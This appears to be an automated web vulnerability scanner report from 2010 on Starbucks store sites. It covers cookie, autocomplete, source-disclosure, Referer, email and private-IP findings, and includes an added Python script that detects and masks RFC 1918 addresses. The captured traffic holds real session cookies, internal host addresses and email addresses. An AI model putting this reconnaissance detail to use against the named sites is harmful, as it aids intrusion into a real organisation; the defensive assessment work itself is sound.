Set-Cookie: ASPSESSIONIDSAADCCCB=HABAELCBHLOMNPJNKIPJJFHG; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:22:10 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:05 GMT
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:50 GMT
Connection: close
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The application appears to disclose some server-side source code written in ASP.
Issue background
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email addresses were disclosed in the response:
info@mystarbucksidea.com
starbuckscardmobile@starbucks.com
Request
GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:08 GMT
Connection: close
Content-Length: 57890
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p> ...[SNIP]... <a href="mailto:info@mystarbucksidea.com"> ...[SNIP]...
The following email address was disclosed in the response:
brian@cherne.net
Request
GET /static/js/global.js HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; skin=
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Oct 2010 20:52:53 GMT
Accept-Ranges: bytes
ETag: "17df8d1d664cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:12:36 GMT
Content-Length: 30097
/* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ <http://cherne.net/brian/resources/jquery.hoverIntent.html> @param f onMouseOver function || An object with configuration options @param g onMo ...[SNIP]... <brian@cherne.net> ...[SNIP]...
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 09 Dec 2009 20:01:41 GMT
Accept-Ranges: bytes
ETag: "b57fbf6ca79ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:11:50 GMT
Content-Length: 24837
//---------------------------------------------------------------------------- // Filename: /GuestAssist/guestassist_jscript.js // Description: this file contains the Guest Assistance subject and t ...[SNIP]... ------------------- --------------- -----------rac arrSubTopics = new Array( new Array(new Array("", "", "", 0, "order")), new Array(new Array("I need help tracking my order", "orders@starbucksstore.com", "Order Inquiries - Tracking", 1, "order"), new Array("I need to cancel or change my order", "orderchanges@starbucksstore.com", "Order Inquiries - Cancellations/Changes", 2, "order"), new Array("I need help with an order I received.", "orders@starbucksstore.com", "Order Inquiry - Fullfillment Issue", 3, "order"), new Array("Other", "orders@starbucksstore.com", "Order Inquiries - Other", 4, "order")),
new Array(new Array("How do I subscribe to the StarbucksStore newsletter?", "support@starbucksstore.com", "Newsletters - Subscribe", 1, "other"), new Array("I need to change my email address.", "support@starbucksstore.com", "Newsletters - Change Address", 2, "other"), new Array("Other", "support@starbucksstore.com", "Newsletters - Other", 3, "other")),
new Array( new Array("How do I pay for my order?", "support@starbucksstore.com", "Shopping - Payment Options", 1, "other"), new Array("How do I complete my order?", "support@starbucksstore.com", "Shopping - Checkout", 2, "other"), new Array("Is your website secure?", "support@starbucksstore.com", "Shopping - Security", 3, "other"), new Array("What do you do with my private information?", "support@starbucksstore.com", "Shopping - Privacy", 4, "other"), new Array("Do you have special offers or coupons?", "support@starbucksstore.com", "Shopping - Special Offers/Discounts", 5, "other"), new Array("Other", "support@starbucksstore.com", "Shopping - Other", 6, "other")),
new Array(new Array("Shipping options and rates.", "support@starbucksstore.com", "Shipping - Options/Rates", 1, "other"), new Array("Do you ship to international locations?", "support@starbucksstore.com", "Shipping - International", 2, "other"), new Array("Other", "support@starbucksstore.com", "Shipping - Other", 3, "other")),
new Array(new Array("How to return products", "returns@starbucksstore.com", "Returns - Process", 1, "returns"), new Array("When will I receive my credit?", "returns@starbucksstore.com", "Returns - Process", 2, "returns"), new Array("Have you received a product I recently returned?", "returns@starbucksstore.com", "Returns - Inquiry", 3, "returns"), new Array("Other", "returns@starbucksstore.com", "Returns - Other", 4, "returns")),
new Array(new Array("Questions about coffee origins.", "products@starbucksstore.com", "Product - General Information", 1, "other"), new Array("Where do I find nutrition information?", "products@starbucksstore.com", "Product - General Information", 2, "other"), new Array("Question about coffee.", "info@starbucks.com", "Product - General Information", 3, "other"), new Array("Question about coffee accessories.", "info@starbucks.com", "Product - General Information", 4, "other"), new Array("Question about other Starbucks products.", "info@starbucks.com", "Product - General Information", 5, "other"), new Array("Replacement parts or product warranty.", "info@starbucks.com", "Product - General Information", 6, "other"), new Array("Question about Starbucks Music", "info@starbucks.com", "Product - General Information", 7, "other"), new Array("Other", "products@starbucksstore.com", "Product - Other", 8, "other")),
new Array(new Array("Why is an account required?", "support@starbucksstore.com", "My Account - Required", 1, "other"), new Array("I forgot my password.", "support@starbucksstore.com", "My Account - Forgot Password", 2, "other"), new Array("How can I change my personal information?", "support@starbucksstore.com", "My Account - Update Email Address", 3, "other"), new Array("How do I create an account?", "support@starbucksstore.com", "My Account - Creating", 4, "other"), new Array("How do I modify my address book?", "support@starbucksstore.com", "My Account - Address Book", 5, "other"), new Array("What do you do with my private information?", "support@starbucksstore.com", "My Account - Privacy", 6, "other"), new Array("May I automatically reorder?", "orders@starbucksstore.com", "My Account - Automatic Reorder", 7, "other"), new Array("Reset my password", "support@starbucksstore.com", "My Account - Reset my password", 8, "other"), new Array("Change my email address", "support@starbucksstore.com", "My Account - Change my email address", 9, "other"), new Array("Help creating an account", "support@starbucksstore.com", "My Account - Help creating an account", 10, "other"), new Array("Modify my address information", "support@starbucksstore.com", "My Account - Modify my address information", 11, "other")),
new Array( new Array("Error message during checkout.", "support@starbucksstore.com", "Technical Support - Error message during checkout", 1, "other"), new Array("Other error message.", "support@starbucksstore.com", "Technical Support - Other error message", 2, "other"), new Array("Something looks wrong on my screen.", "support@starbucksstore.com", "Technical Support - Something looks wrong on my screen", 3, "other"), new Array("Printing problems.", "support@starbucksstore.com", "Technical Support - Printing problems", 3, "other"), new Array("I cannot complete my order.", "support@starbucksstore.com", "Technical Support - I cannot complete my order", 4, "other"), new Array("I received an error message.", "support@starbucksstore.com", "Technical Support - Error Message", 5, "other"), new Array("Other", "support@starbucksstore.com", "Technical Support - Other", 6, "other")),
new Array( new Array("How do I purchase a gift certificate?", "support@starbucksstore.com", "GC - Purchase GC", 1, "other"), new Array("Starbucks card", "info@starbucks.com", "GC - Starbucks Card", 2, "other"), new Array("How do I get coupons?", "support@starbucksstore.com", "GC - Coupons", 3, "other"), new Array("Problem using my gift certificate", "support@starbucksstore.com", "GC - Using GC", 4, "other"), new Array("Problem using my coupon", "support@starbucksstore.com", "GC - Coupon", 5, "other")),
new Array(new Array("Where do I send Marketing proposals?", "support@starbucksstore.com", "Business Services - Marketing", 1, "other"), new Array("Where do I send product samples?", "support@starbucksstore.com", "Business Services - Samples", 2, "other"), new Array("Do you have an Affiliate Program?", "support@starbucksstore.com", "Business Services - Affiliate Program", 3, "other"), new Array("Do you have an automatic reorder program?", "support@starbucksstore.com", "Business Services - Automatic Reorder", 4, "other"), new Array("May we advertise on your site?", " advertising@starbucksstore.com", "Business Services - Advertising", 5, "other"), new Array("Public Relations/Media Inquiries", "pr@starbucksstore.com", "Public Relations/Media Inquiries", 6, "other")),
new Array(new Array("General Information", "info@starbucks.com", "General Information", 1, "other"), new Array("Starbucks grocery products.", "info@starbucks.com", "Starbucks Grocery Products", 2, "other"), new Array("Starbucks card corporate sales", "info@starbucks.com", "Starbucks Card Corporate Sales", 3, "other"), new Array("Starbucks card", "info@starbucks.com", "Starbucks Card General Information", 4, "other"), new Array("International Development & Overseas Partnership Opportunities", "info@starbucks.com", "International Development & Overseas Partnership Opportunities", 5, "other"), new Array("Starbucks.com", "info@starbucks.com", "General", 6, "other"), new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 7, "other"), new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 8, "other"), new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 9, "other")),
new Array(new Array("I have feedback about a product.", "support@starbucksstore.com", "Feedback - Products", 1, "other"), new Array("I have feedback about this website.", "support@starbucksstore.com", "Feedback - Website", 2, "other"), new Array("I have general feedback.", "support@starbucksstore.com", "Feedback - Other", 3, "other"), new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 4, "other"), new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 5, "other"), new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 6, "other")),
new Array(new Array("Advertising", "support@starbucksstore.com", "Advertising - General", 1, "other")),
////////////////////////////////////////////////////////////////////////////// // // Name fillSelectFromArray // Description A function that takes ...[SNIP]...
12. Private IP addresses disclosed
There are 27 instances of this issue:
RFC 1918 specifies three ranges of IP addresses (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16) that are reserved for use in private networks and are not routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure. In the responses below the address is written into the client-side page-tracking variable s_server, which the preceding script comment describes as the page's "identifying name, server, and channel"; the three distinct values observed (10.11.5.101, 10.11.5.108 and 10.11.5.109) are consistent with individual back-end hosts behind a load balancer, so that variable should carry an opaque node label rather than the host's own address.
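As an added example (not part of the scanner report, and not code from the site under test), the following Python script implements both the check and the remediation described above: it extracts dotted-quad candidates from captured HTTP responses, reports only addresses that fall inside the three RFC 1918 blocks, and rewrites any it finds with an opaque keyed-hash label so that nodes behind a load balancer can still be told apart without exposing the address space. The sample responses, paths and key are constructed for illustration; the s_server snippet is modelled on the evidence below but is not captured traffic.

```python
import hashlib
import hmac
import ipaddress
import re

# The three RFC 1918 blocks. Only these are reported: ipaddress's is_private
# would also flag loopback, link-local and documentation ranges, which are
# not the finding this scanner issue describes.
RFC1918_NETWORKS = (
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
)

# Dotted-quad candidates. The lookarounds stop a quad from matching inside a
# longer dotted string (for example a version number such as 1.10.11.5.109).
_DOTTED_QUAD = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def is_rfc1918(candidate: str) -> bool:
    """True only for a syntactically valid IPv4 address inside an RFC 1918 block."""
    try:
        addr = ipaddress.IPv4Address(candidate)  # rejects octets above 255
    except ValueError:
        return False
    return any(addr in net for net in RFC1918_NETWORKS)


def find_rfc1918(text: str) -> list[str]:
    """Distinct RFC 1918 addresses in text, in order of first appearance."""
    found: list[str] = []
    for match in _DOTTED_QUAD.finditer(text):
        candidate = match.group(1)
        if is_rfc1918(candidate) and candidate not in found:
            found.append(candidate)
    return found


def scan_responses(responses: dict[str, str]) -> dict[str, list[str]]:
    """Map each request path to the RFC 1918 addresses its response discloses.

    Headers and body are both scanned, since the leak can sit in either
    (a banner or debug header as easily as an inline script).
    """
    findings: dict[str, list[str]] = {}
    for path, raw in responses.items():
        hits = find_rfc1918(raw)
        if hits:
            findings[path] = hits
    return findings


def node_label(address: str, key: bytes) -> str:
    """Stable, opaque label for a back-end host, derived with a keyed hash.

    The label still distinguishes servers behind a load balancer, but without
    the key it reveals nothing about the internal address space.
    """
    digest = hmac.new(key, address.encode("ascii"), hashlib.sha256).hexdigest()
    return "node-" + digest[:8]


def mask_rfc1918(text: str, key: bytes) -> str:
    """Rewrite every RFC 1918 address in text with its opaque node label."""
    def replace(match: re.Match) -> str:
        candidate = match.group(1)
        return node_label(candidate, key) if is_rfc1918(candidate) else candidate
    return _DOTTED_QUAD.sub(replace, text)


# Constructed sample responses modelled on the report's evidence; the paths,
# analytics snippet and values are illustrative, not captured traffic.
SAMPLE_RESPONSES = {
    "/default.asp": (
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        '<script>var s_pageName="HomePage" var s_server="10.11.5.109" '
        'var s_channel="Shopping"</script>'
    ),
    "/guestassist/shcontus.asp": (
        "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
        '<script>var s_server="10.11.5.101"</script>'
    ),
    "/static/app.js": (
        # Public addresses and a version string: must produce no finding.
        "HTTP/1.1 200 OK\r\nContent-Type: application/x-javascript\r\n\r\n"
        'var cdn="172.100.8.9"; var build="1.10.11.5.109"; var dns="8.8.8.8";'
    ),
}

if __name__ == "__main__":
    for path, addrs in scan_responses(SAMPLE_RESPONSES).items():
        print(path, "discloses", ", ".join(addrs))
    print(mask_rfc1918(SAMPLE_RESPONSES["/default.asp"], key=b"rotate-this-key"))
```

Two details matter in practice. Membership is tested against the explicit RFC 1918 networks rather than a bare `172\.` or `192\.` prefix match, because 172.16.0.0/12 covers only 172.16 through 172.31 and a naive pattern would both flag public addresses such as 172.100.8.9 and miss nothing useful; and `ipaddress.IPv4Address.is_private` is deliberately not used, since it also returns true for loopback, link-local and documentation ranges that are a different finding. The masking label is keyed so that an attacker who sees the labels cannot brute-force the 10.0.0.0/8 space to recover the mapping.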
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21201 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:18:41 GMT
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/default.asp?CCAID=SBPTPAHP1SHT ...[SNIP]...
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14191 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=NGKAELCBMACFABOABHGPBGCG; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:32:40 GMT
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/poweredbycooking.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/p ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14191 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:21 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/poweredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/p ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19809 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:37 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/d ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21084 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:35:58 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/defa ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:43:40 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
GET /entertainment/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16333 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:42:31 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" conte ...[SNIP]... <!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="Starbucks Entertainment" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Entertainment" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/entertainment/d ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.11.5.109
Request
